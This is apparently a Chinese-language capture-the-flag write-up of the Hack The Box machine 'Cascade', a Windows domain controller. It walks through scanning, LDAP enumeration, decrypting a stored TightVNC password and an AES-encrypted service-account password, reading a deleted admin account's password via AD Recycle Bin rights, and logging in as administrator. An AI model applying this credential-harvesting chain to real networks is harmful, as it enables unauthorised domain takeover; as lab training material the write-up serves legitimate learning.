端口扫描

┌──(mikannse㉿kali)-[~/Desktop/Cascade]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.182
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-14 11:36 CST
Nmap scan report for 10.10.10.182
Host is up (0.079s latency).
Not shown: 65520 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49165/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 13.44 seconds
┌──(mikannse㉿kali)-[~/Desktop/Cascade]
└─$ sudo nmap -sT -sC -sV -O -p53,88,135,139,389,445,636,3268,3269,5985,49154,49155,49157,49158,49165 10.10.10.182
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-14 11:38 CST
Nmap scan report for 10.10.10.182
Host is up (0.072s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-14 03:27:58Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|7|2008|8.1|Vista (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (89%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-09-14T03:28:55
|_  start_date: 2024-09-14T03:21:59
|_clock-skew: -10m27s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.62 seconds

Enum

SMB共享匿名连不上,枚举一下用户

┌──(mikannse㉿kali)-[~/tools/domain/windapsearch]
└─$ python windapsearch.py -d cascade.local --dc-ip 10.10.10.182 -U >~/HTB/cascade/ldap_result
┌──(mikannse㉿kali)-[~/HTB/cascade]
└─$ cat ldap_result |grep userPrincipalName |awk -F ' ' '{print $2}' |cut -d '@' -f1 >username

得到了一个用户名字典,尝试跑了一下GetNPUser和弱口令都无果,回到ldap枚举再看一下

发现r.thompson用户有一个属性是:

cascadeLegacyPwd: clk0bjVldmE=,解码得到:rY4n5eva

┌──(mikannse㉿kali)-[~/HTB/cascade]
└─$ smbmap -H cascade.local -u r.thompson -p 'rY4n5eva'
<SNIP>
[+] IP: 10.10.10.182:445        Name: cascade.local             Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        Audit$                                                  NO ACCESS
        C$                                                      NO ACCESS       Default share
        Data                                                    READ ONLY
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        print$                                                  READ ONLY       Printer Drivers
        SYSVOL                                                  READ ONLY       Logon server share

连接Data共享然后递归下载,IT目录下有一个Meeting Note

我们将使用临时帐户执行与网络迁移相关的所有任务,迁移完成后,该帐户将于 2018 年底删除。这将使我们能够在安全日志等中识别与迁移相关的操作。用户名是 TempAdmin(密码与普通管理员帐户密码相同)

FootHold

除此之外,s.smith用户目录里还有一个tightvnc的注册表的dump

┌──(mikannse㉿kali)-[~/…/smb/IT/Temp/s.smith]
└─$ cat VNC\ Install.reg   
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
<SNIP>
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
<SNIP>

参考:https://github.com/billchaison/VNCDecrypt

┌──(mikannse㉿kali)-[~/…/smb/IT/Temp/s.smith]
└─$ echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d -provider legacy -provider default | hexdump -Cv
00000000  73 54 33 33 33 76 65 32                           |sT333ve2|
00000008

得到凭证:s.smith:sT333ve2

┌──(mikannse㉿kali)-[~/HTB/cascade]
└─$ evil-winrm -i 10.10.10.182 -u 's.smith' -p 'sT333ve2'

但是报了错:

Error: An error of type HTTPClient::ReceiveTimeoutError happened, message is execution expired
                                        
Error: Exiting with code 1

排查了半天,是vpn的问题,多切换一下VPN试试可以解决

横向移动

桌面还有一个快捷方式,似乎是用于执行C:\Program Files (x86)\WinDirStat\windirstat.exe,,似乎适用于查看磁盘信息的

┌──(mikannse㉿kali)-[~/HTB/cascade]
└─$ smbclient //10.10.10.182/NETLOGON -U s.smith
Password for [WORKGROUP\s.smith]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Jan 16 05:50:33 2020
  ..                                  D        0  Thu Jan 16 05:50:33 2020
  MapAuditDrive.vbs                   A      258  Thu Jan 16 05:50:15 2020
  MapDataDrive.vbs                    A      255  Thu Jan 16 05:51:03 2020

                6553343 blocks of size 4096. 1625526 blocks available

还有一个netlogon共享,Netlogon 服务是Windows Active Directory环境中的一项关键服务,它负责维护域内计算机的登录过程和服务

里面有两个vb脚本,也许在用户登录时自动执行,查看一下组策略,执行的是MapAuditDrive.vbs

*Evil-WinRM* PS C:\Users\s.smith> Get-ADUser -identity s.smith -properties *

<SNIP>
pwdLastSet                         : 132247150854857364
SamAccountName                     : s.smith
sAMAccountType                     : 805306368
ScriptPath                         : MapAuditDrive.vbs
<SNIP>

查看一下这个脚本,将远程共享\\CASC-DC1\Audit$映射为本地计算机上的F:驱动器

┌──(mikannse㉿kali)-[~/HTB/cascade]
└─$ smbclient '//10.10.10.182/Audit$' -U s.smith
Password for [WORKGROUP\s.smith]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Jan 30 02:01:26 2020
  ..                                  D        0  Thu Jan 30 02:01:26 2020
  CascAudit.exe                      An    13312  Wed Jan 29 05:46:51 2020
  CascCrypto.dll                     An    12288  Thu Jan 30 02:00:20 2020
  DB                                  D        0  Wed Jan 29 05:40:59 2020
  RunAudit.bat                        A       45  Wed Jan 29 07:29:47 2020
  System.Data.SQLite.dll              A   363520  Sun Oct 27 14:38:36 2019
  System.Data.SQLite.EF6.dll          A   186880  Sun Oct 27 14:38:38 2019
  x64                                 D        0  Mon Jan 27 06:25:27 2020
  x86                                 D        0  Mon Jan 27 06:25:27 2020

                6553343 blocks of size 4096. 1625516 blocks available

递归全部下载下来,运行.bat则可以自动用CascAudit.exe来连接DB中的Audit.db,搜索了一下这个可执行程序,似乎是这个房间特有的,DB数据库是SQLite。直接查看这个DB文件,在Ldap表中发现

ArkSvc:BQO5l5Kj9MdErXx6Q6AGOw==,但是这个凭证并不是base64编码。那么这个CascAudit.exe肯定是做什么特殊的加解密,IDA好像无法逆向这个由.net编写的可执行程序,使用 https://github.com/dnSpy/dnSpy/releases/tag/v6.1.8

找到CascAudit->Mainmodule

重点逻辑如下:

sqliteConnection.Open();
						using (SQLiteCommand sqliteCommand = new SQLiteCommand("SELECT * FROM LDAP", sqliteConnection))
						{
							using (SQLiteDataReader sqliteDataReader = sqliteCommand.ExecuteReader())
							{
								sqliteDataReader.Read();
								str = Conversions.ToString(sqliteDataReader["Uname"]);
								str2 = Conversions.ToString(sqliteDataReader["Domain"]);
								string encryptedString = Conversions.ToString(sqliteDataReader["Pwd"]);
								try
								{
									password = Crypto.DecryptString(encryptedString, "c4scadek3y654321");
								}
								catch (Exception ex)
								{
									Console.WriteLine("Error decrypting password: " + ex.Message);
									return;
								}
							}
						}
						sqliteConnection.Close();
					}

从数据库读取ldap的用户名和密码,其中密码用Crypto.DecryptString进行解密,定位这个解密函数:

public static string DecryptString(string EncryptedString, string Key)
{
	byte[] array = Convert.FromBase64String(EncryptedString);
	Aes aes = Aes.Create();
	aes.KeySize = 128;
	aes.BlockSize = 128;
	aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
	aes.Mode = CipherMode.CBC;
	aes.Key = Encoding.UTF8.GetBytes(Key);
	string @string;
	using (MemoryStream memoryStream = new MemoryStream(array))
	{
		using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), CryptoStreamMode.Read))
		{
			byte[] array2 = new byte[checked(array.Length - 1 + 1)];
			cryptoStream.Read(array2, 0, array2.Length);
			@string = Encoding.UTF8.GetString(array2);
		}
	}
	return @string;
}

那么也就是从数据库读取密码之后,进行base64解码,然后aes解密,已经有了IV向量和key,cyberchef跑一下就能出

From_Base64('A-Za-z0-9%2B/%3D',true,false)AES_Decrypt({'option':'UTF8','string':'c4scadek3y654321'},{'option':'UTF8','string':'1tdyjCbY1Ix49842'},'CBC','Raw','Raw',{'option':'Hex','string':''},{'option':'Hex','string':''})&input=QlFPNWw1S2o5TWRFclh4NlE2QUdPdz09

得到凭据:ArkSvc:w3lc0meFr31nd,能够远程登录

提权

发现有一个很可疑的组CASCADE\AD Recycle Bin,可以管理已经被删除的用户对象,联系到一开始的Tempadmin

https://book.hacktricks.xyz/v/cn/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges

*Evil-WinRM* PS C:\Users\arksvc> Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *

<SNIP>
accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : cascade.local/Deleted Objects/TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
CN                              : TempAdmin
<SNIP>

得到tempadmin的密码baCT3r1aN00dles,和管理员的相同,那么连接至管理员

┌──(mikannse㉿kali)-[~/HTB/cascade]
└─$ evil-winrm -i 10.10.10.182 -u 'administrator' -p 'baCT3r1aN00dles'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                   
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                     
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami 
cascade\administrator

碎碎念

很有趣的房间,其实前面枚举的部分都大差不差吧,然后横向来横向去。对VNC,数据库什么的逆向来获取凭证很有意思